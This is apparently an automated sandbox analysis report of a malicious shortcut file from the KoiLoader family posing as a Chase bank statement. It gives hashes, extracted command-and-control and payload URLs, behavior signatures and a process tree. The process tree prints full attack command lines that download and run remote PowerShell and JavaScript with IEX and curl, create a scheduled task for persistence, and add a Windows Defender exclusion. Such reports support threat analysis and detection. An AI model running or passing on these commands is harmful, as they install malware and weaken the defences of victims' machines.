Analysis
-
max time kernel
131s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2025, 17:10
Static task
static1
Behavioral task
behavioral1
Sample
chase_statement_march lnk.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
chase_statement_march lnk.lnk
Resource
win10v2004-20250314-en
General
-
Target
chase_statement_march lnk.lnk
-
Size
1KB
-
MD5
202ee916a0113699880cc2e48a73d353
-
SHA1
85d9b74b2afa5bf0320e746a2871ef614159db2e
-
SHA256
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb
-
SHA512
c729137c2680e98e9686d6a2368e184fc38897032d0d0bf1e1c5a84530cc45208bfc60085be768c027d4ce52b627a7f308458ac5ed480c32289bc5a0d7c0a35e
Malware Config
Extracted
https://casettalecese.it/wp-content/uploads/2022/10
Extracted
koiloader
http://94.247.42.253/pilot.php
-
payload_url
https://casettalecese.it/wp-content/uploads/2022/10
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral2/memory/4868-57-0x0000000008380000-0x000000000838D000-memory.dmp family_koi_loader -
Blocklisted process makes network request 6 IoCs
flow pid Process 7 2120 powershell.exe 66 4868 powershell.exe 67 4868 powershell.exe 69 3940 powershell.exe 70 3940 powershell.exe 83 4868 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2384 powershell.exe 2120 powershell.exe 3940 powershell.exe 4868 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation wscript.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 3616 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1624 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2120 powershell.exe 2120 powershell.exe 3616 powershell.exe 3616 powershell.exe 4868 powershell.exe 4868 powershell.exe 2384 powershell.exe 2384 powershell.exe 2384 powershell.exe 3940 powershell.exe 3940 powershell.exe 3940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2120 powershell.exe Token: SeDebugPrivilege 3616 powershell.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 5028 wrote to memory of 2120 5028 cmd.exe 87 PID 5028 wrote to memory of 2120 5028 cmd.exe 87 PID 2120 wrote to memory of 2444 2120 powershell.exe 90 PID 2120 wrote to memory of 2444 2120 powershell.exe 90 PID 2120 wrote to memory of 1624 2120 powershell.exe 91 PID 2120 wrote to memory of 1624 2120 powershell.exe 91 PID 3976 wrote to memory of 3616 3976 wscript.EXE 112 PID 3976 wrote to memory of 3616 3976 wscript.EXE 112 PID 3616 wrote to memory of 4992 3616 powershell.exe 114 PID 3616 wrote to memory of 4992 3616 powershell.exe 114 PID 3616 wrote to memory of 3096 3616 powershell.exe 115 PID 3616 wrote to memory of 3096 3616 powershell.exe 115 PID 3096 wrote to memory of 4868 3096 wscript.exe 116 PID 3096 wrote to memory of 4868 3096 wscript.exe 116 PID 3096 wrote to memory of 4868 3096 wscript.exe 116 PID 2628 wrote to memory of 64 2628 DllHost.exe 119 PID 2628 wrote to memory of 64 2628 DllHost.exe 119 PID 2628 wrote to memory of 64 2628 DllHost.exe 119 PID 64 wrote to memory of 2384 64 cmd.exe 121 PID 64 wrote to memory of 2384 64 cmd.exe 121 PID 64 wrote to memory of 2384 64 cmd.exe 121 PID 4868 wrote to memory of 4448 4868 powershell.exe 122 PID 4868 wrote to memory of 4448 4868 powershell.exe 122 PID 4868 wrote to memory of 4448 4868 powershell.exe 122 PID 4448 wrote to memory of 3940 4448 cmd.exe 124 PID 4448 wrote to memory of 3940 4448 cmd.exe 124 PID 4448 wrote to memory of 3940 4448 cmd.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\chase_statement_march lnk.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('htphwirvsci9k5.js jycqenaew'); $getf='Dow'+'nl'+'oadF'+'ile'; $x5yd46kp30cefn911gg = New-Object Net.WebClient; $wscs = 'wscript '; $x5yd46kp30cefn911gg.$getf('https://casettalecese.it/wp-content/uploads/2022/10/hemigastrectomySDur.php', 'htphwirvsci9k5.js'); . ('curl.e'+'xe') -s -o cs5c09hr6xij 'https://casettalecese.it/wp-content/uploads/2022/10/bivalviaGrr.php'; mv cs5c09hr6xij 'jycqenaew.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $pdw) /tn jycqenaew;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -s -o cs5c09hr6xij https://casettalecese.it/wp-content/uploads/2022/10/bivalviaGrr.php3⤵PID:2444
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\htphwirvsci9k5.js jycqenaew" /tn jycqenaew3⤵
- Scheduled Task/Job: Scheduled Task
PID:1624
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\ProgramData\htphwirvsci9k5.js jycqenaew1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn jycqenaew /f; wscript $env:programdata\jycqenaew.js "2⤵
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn jycqenaew /f3⤵PID:4992
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\jycqenaew.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$typs=[Ref].Assembly.GetTypes();$bss = 'https://casettalecese.it/wp-content/uploads/2022/10'; Foreach($tt in $typs) {if ($tt.Name -like '*?siUt*s') {$c=$tt}}; $env:paths = '7z9E14VRS2OE'; IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/boomier10qD0.php')); IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/nephralgiaMsy.ps1'))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://casettalecese.it/wp-content/uploads/2022/10/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://casettalecese.it/wp-content/uploads/2022/10/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r36b1fe7c-a761-496a-8112-d9eb33b24287r.js"1⤵PID:3096
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54158e856ffe280ff282e1de33cf6dda1
SHA169c2b8da2c5c852583f39c78b9f64735b2e8172d
SHA2560afb21d22c9d8861e55859eaaf5a9f81ffebd8907700bdf2f804a95409f6d769
SHA512539a0a2d914e091c6f9a604b9dc9351489bf61eff9ebc75cbfc785603dd5fdd3bc70376b5712e36fc3d04959f7f4ae2c0d60985b36612ff4f543acd77e723d30
-
Filesize
198B
MD5af9f1f2076317c03e21d56367e638af4
SHA161c4f850591f851acd3108104ef14f0fe32f95a6
SHA25670835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1
SHA512c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD5d136e1c06d3fa8b0736aa4939b86fce5
SHA1c4e91a0ecd6b63317f66b4a1b650976718cc4558
SHA2564c786351db8277fb8b6beb22f02ec72deaac6bf1a705d0f61321f159a9ef500a
SHA51261a06f4e2848fc5d0d1687b8f257f553f85dcf047045c40526a52902a7d9b9076ed70b63a9a226f8550aa91a8f725cc324a7709abf4fd36f45f4948c15b7764e
-
Filesize
1KB
MD55c19faffc721938d5476051175e33c50
SHA1f04851981aee4a9ac9e334cda9171353537404be
SHA2564c2e4bdde066989dcb06e2d697388bb6d86ecab2469e7a6d2ea32ecbe8c6ae35
SHA5120c32a28c38650ba69868b35086e729e8fa9610c59a16a8e79e8d130cfa6340fe16db846dd5bd86b77f4ebe56152a63ea9d26becdd57e727c205326a31033df95
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82